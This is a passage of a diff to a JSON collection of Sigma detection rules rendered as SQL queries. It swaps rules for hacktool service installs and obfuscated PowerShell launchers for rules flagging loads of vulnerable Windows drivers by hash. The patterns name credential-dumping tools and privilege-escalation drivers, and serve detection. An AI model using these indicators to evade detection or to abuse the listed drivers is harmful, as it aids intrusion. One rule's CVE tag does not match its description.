ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "status": "experimental", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE '%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE '%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' ESCAPE '\\' OR Hashes LIKE '%MD5=c3fea895fe95ea7a57d9f4d7abed5e71%' ESCAPE '\\' OR Hashes LIKE '%MD5=2128e6c044ee86f822d952a261af0b48%' ESCAPE '\\' OR Hashes LIKE '%MD5=3dbf69f935ea48571ea6b0f5a2878896%' ESCAPE '\\' OR Hashes LIKE '%MD5=c6f8983dd3d75640c072a8459b8fa55a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=79f7e6f98a5d3ab6601622be4471027f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bae1f127c4ff21d8fe45e2bbfc59c180%' ESCAPE '\\' OR Hashes LIKE '%MD5=c533d6d64b474ffc3169a0e0fc0a701a%' ESCAPE '\\' OR Hashes LIKE '%MD5=3f39f013168428c8e505a7b9e6cba8a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=748cf64b95ca83abc35762ad2c25458f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bce7f34912ff59a3926216b206deb09f%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d8e4f38b36c334d0a32a7324832501d%' ESCAPE '\\' OR Hashes LIKE '%MD5=47e6ac52431ca47da17248d80bf71389%' ESCAPE '\\' OR Hashes LIKE '%MD5=3651a6990fe38711ebb285143f867a43%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc943bf367ae77016ae399df8e71d38a%' ESCAPE '\\' OR Hashes LIKE '%MD5=02198692732722681f246c1b33f7a9d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=ddc2ffe0ab3fcd48db898ab13c38d88d%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ec361f2fba49c73260af351c39ff9cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1fce7aac4e9dd7a730997e2979fa1e2%' ESCAPE '\\' OR Hashes LIKE '%MD5=49938383844ceec33dba794fb751c9a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=34069a15ae3aa0e879cd0d81708e4bcc%' ESCAPE '\\' OR Hashes LIKE '%MD5=1c294146fc77565030603878fd0106f9%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd81af62964f5dd5eb4a828543a33dcf%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd5b0514f3b40f139d8079138d01b5f6%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa173832dca1b1faeba095e5c82a1559%' ESCAPE '\\' OR Hashes LIKE '%MD5=5cc5c26fc99175997d84fe95c61ab2c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed043249c21ab201edccb37f1d40af9%' ESCAPE '\\' OR Hashes LIKE '%MD5=361a598d8bb92c13b18abb7cac850b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b359b722ac80c4e0a5235264e1e0156%' ESCAPE '\\' OR Hashes LIKE '%MD5=296bde4d0ed32c6069eb90c502187d0d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d3e40644a91327da2b1a7241606fe559%' ESCAPE '\\' OR Hashes LIKE '%MD5=12cecc3c14160f32b21279c1a36b8338%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd39a86852b498b891672ffbcd071c03%' ESCAPE '\\' OR Hashes LIKE '%MD5=b2a9ac0600b12ec9819e049d7a6a0b75%' ESCAPE '\\' OR Hashes LIKE '%MD5=444f538daa9f7b340cfd43974ed43690%' ESCAPE '\\' OR Hashes LIKE '%MD5=7b43dfd84de5e81162ebcfafb764b769%' ESCAPE '\\' OR Hashes LIKE '%MD5=13dda15ef67eb265869fc371c72d6ef0%' ESCAPE '\\' OR Hashes LIKE '%MD5=300c5b1795c9b6cc1bc4d7d55c7bbe85%' ESCAPE '\\' OR Hashes LIKE '%MD5=1392b92179b07b672720763d9b1028a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=2e1f8a2a80221deb93496a861693c565%' ESCAPE '\\' OR Hashes LIKE '%MD5=8065a7659562005127673ac52898675f%' ESCAPE '\\' OR Hashes LIKE '%MD5=b5ada7fd226d20ec6634fc24768f9e22%' ESCAPE '\\' OR Hashes LIKE '%MD5=84fb76ee319073e77fb364bbbbff5461%' ESCAPE '\\' OR Hashes LIKE '%MD5=daf800da15b33bf1a84ee7afc59f0656%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7393fb917aed182e4cbef25ce8af950%' ESCAPE '\\' OR Hashes LIKE '%MD5=120b5bbb9d2eb35ff4f62d79507ea63a%' ESCAPE '\\' OR Hashes LIKE '%MD5=73c98438ac64a68e88b7b0afd11ba140%' ESCAPE '\\' OR Hashes LIKE '%MD5=51207adb8dab983332d6b22c29fe8129%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a23e0f2c6f926a41b28d574cbc6ac30%' ESCAPE '\\' OR Hashes LIKE '%MD5=20125794b807116617d43f02b616e092%' ESCAPE '\\' OR Hashes LIKE '%MD5=e8ebba56ea799e1e62748c59e1a4c586%' ESCAPE '\\' OR Hashes LIKE '%MD5=8abbb12e61045984eda19e2dc77b235e%' ESCAPE '\\' OR Hashes LIKE '%MD5=f66b96aa7ae430b56289409241645099%' ESCAPE '\\' OR Hashes LIKE '%MD5=97e3a44ec4ae58c8cc38eefc613e950e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ff7b31fa6e9ab923bce8af31d1be5bb2%' ESCAPE '\\' OR Hashes LIKE '%MD5=12908c285b9d68ee1f39186110df0f1e%' ESCAPE '\\' OR Hashes LIKE '%MD5=6126065af2fc2639473d12ee3c0c198e%' ESCAPE '\\' OR Hashes LIKE '%MD5=356bda2bf0f6899a2c08b2da3ec69f13%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd7de498a72b2daf89f321d23948c3c4%' ESCAPE '\\' OR Hashes LIKE '%MD5=338a98e1c27bc76f09331fcd7ae413a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=c9a293762319d73c8ee84bcaaf81b7b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=e9e786bdba458b8b4f9e93d034f73d00%' ESCAPE '\\' OR Hashes LIKE '%MD5=a17c58c0582ee560c72f60764ed63224%' ESCAPE '\\' OR Hashes LIKE '%MD5=21e13f2cb269defeae5e1d09887d47bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=a57b47489febc552515778dd0fd1e51c%' ESCAPE '\\' OR Hashes LIKE '%MD5=d6e9f6c67d9b3d790d592557a7d57c3c%' ESCAPE '\\' OR Hashes LIKE '%MD5=76bb1a4332666222a8e3e1339e267179%' ESCAPE '\\' OR Hashes LIKE '%MD5=1cd158a64f3d886357535382a6fdad75%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9e7e5bcc5b01915dbcef7762a7fc329%' ESCAPE '\\' OR Hashes LIKE '%MD5=d253c19194a18030296ae62a10821640%' ESCAPE '\\' OR Hashes LIKE '%MD5=b12d1630fd50b2a21fd91e45d522ba3a%' ESCAPE '\\' OR Hashes LIKE '%MD5=50b39072d0ee9af5ef4824eca34be6e3%' ESCAPE '\\' OR Hashes LIKE '%MD5=778b7feea3c750d44745d3bf294bd4ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=0761c357aed5f591142edaefdf0c89c8%' ESCAPE '\\' OR Hashes LIKE '%MD5=23cf3da010497eb2bf39a5c5a57e437c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c49a1956a6a25ffc25ad97d6762b0989%' ESCAPE '\\' OR Hashes LIKE '%MD5=f406c5536bcf9bacbeb7ce8a3c383bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=f2f728d2f69765f5dfda913d407783d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b817d0e7714b9d43db43ae4a22a161e%' ESCAPE '\\' OR Hashes LIKE '%MD5=715f8efab1d1c660e4188055c4b28eed%' ESCAPE '\\' OR Hashes LIKE '%MD5=a01c412699b6f21645b2885c2bae4454%' ESCAPE '\\' OR Hashes LIKE '%MD5=010c0e5ac584e3ab97a2daf84cf436f5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5db81974ffda566fa821400419f59be%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014ba35d406475311a2eab0c4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d487f77be4471900d6ccbc47242cc25%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f2888e57fdd6aee466962c25ba7d62d%' ESCAPE '\\' OR Hashes LIKE '%MD5=507a649eb585d8d0447eab0532ef0c73%' ESCAPE '\\' OR Hashes LIKE '%MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11%' ESCAPE '\\' OR Hashes LIKE '%MD5=cd9f0fcecf1664facb3671c0130dc8bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=b10b210c5944965d0dc85e70a0b19a42%' ESCAPE '\\' OR Hashes LIKE '%MD5=ae5eb2759305402821aeddc52ba9a6d6%' ESCAPE '\\' OR Hashes LIKE '%MD5=f5051c756035ef5de9c4c48bacb0612b%' ESCAPE '\\' OR Hashes LIKE '%MD5=1898ceda3247213c084f43637ef163b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=37086ae5244442ba552803984a11d6cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=825703c494e0d270f797f1ecf070f698%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\' OR Hashes LIKE '%MD5=75d6c3469347de1cdfa3b1b9f1544208%' ESCAPE '\\' OR Hashes LIKE '%MD5=9ab9f3b75a2eb87fafb1b7361be9dfb3%' ESCAPE '\\' OR Hashes LIKE '%MD5=5f9785e7535f8f602cb294a54962c9e7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7d46d0ddaf8c7e1776a70c220bf47524%' ESCAPE '\\' OR Hashes LIKE '%MD5=f9844524fb0009e5b784c21c7bad4220%' ESCAPE '\\' OR Hashes LIKE '%MD5=828bb9cb1dd449cd65a29b18ec46055f%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d17b32be70ef39eae5d5edeb5e89877%' ESCAPE '\\' OR Hashes LIKE '%MD5=2391fb461b061d0e5fccb050d4af7941%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d4159694e1754f262e326b52a3b305a%' ESCAPE '\\' OR Hashes LIKE '%MD5=a60c9173563b940203cf4ad38ccf2082%' ESCAPE '\\' OR Hashes LIKE '%MD5=63e333d64a8716e1ae59f914cb686ae8%' ESCAPE '\\' OR Hashes LIKE '%MD5=a9f220b1507a3c9a327a99995ff99c82%' ESCAPE '\\' OR Hashes LIKE '%MD5=c5f5d109f11aadebae94c77b27cb026f%' ESCAPE '\\' OR Hashes LIKE '%MD5=5bab40019419a2713298a5c9173e5d30%' ESCAPE '\\' OR Hashes LIKE '%MD5=c996d7971c49252c582171d9380360f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=98763a3dee3cf03de334f00f95fc071a%' ESCAPE '\\' OR Hashes LIKE '%MD5=e79c91c27df3eaf82fb7bd1280172517%' ESCAPE '\\' OR Hashes LIKE '%MD5=a42249a046182aaaf3a7a7db98bfa69d%' ESCAPE '\\' OR Hashes LIKE '%MD5=803a371a78d528a44ef8777f67443b16%' ESCAPE '\\' OR Hashes LIKE '%MD5=9007c94c9d91ccff8d7f5d4cdddcc403%' ESCAPE '\\' OR Hashes LIKE '%MD5=11fb599312cb1cf43ca5e879ed6fb71e%' ESCAPE '\\' OR Hashes LIKE '%MD5=7f9309f5e4defec132b622fadbcad511%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=8636fe3724f2bcba9399daffd6ef3c7e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9dfd73dadb2f1c7e9c9d2542981aaa63%' ESCAPE '\\' OR Hashes LIKE '%MD5=490b1f404c4f31f4538b36736c990136%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1d063c9422a19944cdaa6714623f2ec%' ESCAPE '\\' OR Hashes LIKE '%MD5=dacb62578b3ea191ea37486d15f4f83c%' ESCAPE '\\' OR Hashes LIKE '%MD5=2da209dde8188076a9579bd256dc90d0%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ba6afe0ea182236f98365bd977adfdf%' ESCAPE '\\' OR Hashes LIKE '%MD5=4c016fd76ed5c05e84ca8cab77993961%' ESCAPE '\\' OR Hashes LIKE '%MD5=ad22a7b010de6f9c6f39c350a471a440%' ESCAPE '\\' OR Hashes LIKE '%MD5=79483cb29a0c428e1362ec8642109eee%' ESCAPE '\\' OR Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%MD5=ccf523b951afaa0147f22e2a7aae4976%' ESCAPE '\\' OR Hashes LIKE '%MD5=736c4b85ce346ddf3b49b1e3abb4e72a%' ESCAPE '\\' OR Hashes LIKE '%MD5=b0baac4d6cbac384a633c71858b35a2e%' ESCAPE '\\' OR Hashes LIKE '%MD5=798de15f187c1f013095bbbeb6fb6197%' ESCAPE '\\' OR Hashes LIKE '%MD5=a86150f2e29b35369afa2cafd7aa9764%' ESCAPE '\\' OR Hashes LIKE '%MD5=b941c8364308990ee4cc6eadf7214e0f%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd04cd3de0c19bede84e9c95a86b3ca8%' ESCAPE '\\' OR Hashes LIKE '%MD5=6909b5e86e00b4033fedfca1775b0e33%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b91a44a488e4d539f2e55476b216024%' ESCAPE '\\' OR Hashes LIKE '%MD5=8b287636041792f640f92e77e560725e%' ESCAPE '\\' OR Hashes LIKE '%MD5=07f83829e7429e60298440cd1e601a6a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0395b4e0eb21693590ad1cfdf7044b8b%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b058945c9f2b8d8ebc485add1101ba5%' ESCAPE '\\' OR Hashes LIKE '%MD5=0067c788e1cb174f008c325ebde56c22%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2c1b8c00b99e913d992a870ed478a24%' ESCAPE '\\' OR Hashes LIKE '%MD5=84ba7af6ada1b3ea5efb9871a0613fc6%' ESCAPE '\\' OR Hashes LIKE '%MD5=dbc415304403be25ac83047c170b0ec2%' ESCAPE '\\' OR Hashes LIKE '%MD5=31469f1313871690e8dc2e8ee4799b22%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d465b4487dc81effaa84f122b71c24f%' ESCAPE '\\' OR Hashes LIKE '%MD5=64efbffaa153b0d53dc1bccda4279299%' ESCAPE '\\' OR Hashes LIKE '%MD5=b164daf106566f444dfb280d743bc2f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7c72a7e1d42b0790773efd8700e24952%' ESCAPE '\\' OR Hashes LIKE '%MD5=56a515173b211832e20fbc64e5a0447c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2eb4539a4f6ab6edd01bdc191619975%' ESCAPE '\\' OR Hashes LIKE '%MD5=d1bac75205c389d6d5d6418f0457c29b%' ESCAPE '\\' OR Hashes LIKE '%MD5=68dde686d6999ad2e5d182b20403240b%' ESCAPE '\\' OR Hashes LIKE '%MD5=a785b3bc4309d2eb111911c1b55e793f%' ESCAPE '\\' OR Hashes LIKE '%MD5=6ab7b8ef0c44e7d2d5909fdb58d37fa5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9ce18960c23f38706ae9c6584d9ac90%' ESCAPE '\\' OR Hashes LIKE '%MD5=ab53d07f18a9697139ddc825b466f696%' ESCAPE '\\' OR Hashes LIKE '%MD5=ba5f0f6347780c2ed911bbf888e75bef%' ESCAPE '\\' OR Hashes LIKE '%MD5=13ee349c15ee5d6cf640b3d0111ffc0e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9a237fa07ce3ed06ea924a9bed4a6b99%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa222bed731713904320723b9c085b11%' ESCAPE '\\' OR Hashes LIKE '%MD5=0898af0888d8f7a9544ef56e5e16354e%' ESCAPE '\\' OR Hashes LIKE '%MD5=e076dadf37dd43a6b36aeed957abee9e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f27c09cc8680e06b04d6a9c34ca1e08%' ESCAPE '\\' OR Hashes LIKE '%MD5=1b32c54b95121ab1683c7b83b2db4b96%' ESCAPE '\\' OR Hashes LIKE '%MD5=715572dfe6fb10b16f980bfa242f3fa5%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a06bcd96ef0b90a1753a805b4235f28%' ESCAPE '\\' OR Hashes LIKE '%MD5=f242cffd9926c0ccf94af3bf16b6e527%' ESCAPE '\\' OR Hashes LIKE '%MD5=7ed6030f14e66e743241f2c1fa783e69%' ESCAPE '\\' OR Hashes LIKE '%MD5=0d6fef14f8e1ce5753424bd22c46b1ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=a4fda97f452b8f8705695a729f5969f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=62c18d61ed324088f963510bae43b831%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5a642329cce4df94b8dc1ba9660ae34%' ESCAPE '\\' OR Hashes LIKE '%MD5=a641e3dccba765a10718c9cb0da7879e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed07f1a8038596574184e09211dfc30f%' ESCAPE '\\' OR Hashes LIKE '%MD5=3473faea65fba5d4fbe54c0898a3c044%' ESCAPE '\\' OR Hashes LIKE '%MD5=708ac9f7b12b6ca4553fd8d0c7299296%' ESCAPE '\\' OR Hashes LIKE '%MD5=bbe4f5f8b0c0f32f384a83ae31f49a00%' ESCAPE '\\' OR Hashes LIKE '%MD5=257483d5d8b268d0d679956c7acdf02d%' ESCAPE '\\' OR Hashes LIKE '%MD5=312e31851e0fc2072dbf9a128557d6ef%' ESCAPE '\\' OR Hashes LIKE '%MD5=14eead4d42728e9340ec8399a225c124%' ESCAPE '\\' OR Hashes LIKE '%MD5=de1cc5c266140bff9d964fab87a29421%' ESCAPE '\\' OR Hashes LIKE '%MD5=9a9dbf5107848c254381be67a4c1b1dd%' ESCAPE '\\' OR Hashes LIKE '%MD5=1dc94a6a82697c62a04e461d7a94d0b0%' ESCAPE '\\' OR Hashes LIKE '%MD5=2850608430dd089f24386f3336c84729%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d131a7462e568213b44ef69156f10a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=b8b6686324f7aa77f570bc019ec214e6%' ESCAPE '\\' OR Hashes LIKE '%MD5=22823fed979903f8dfe3b5d28537eb47%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1d3a6bb423739a5e781f7eee04c9cfd%' ESCAPE '\\' OR Hashes LIKE '%MD5=0c0195c48b6b8582fa6f6373032118da%' ESCAPE '\\' OR Hashes LIKE '%MD5=5228b7a738dc90a06ae4f4a7412cb1e9%' ESCAPE '\\' OR Hashes 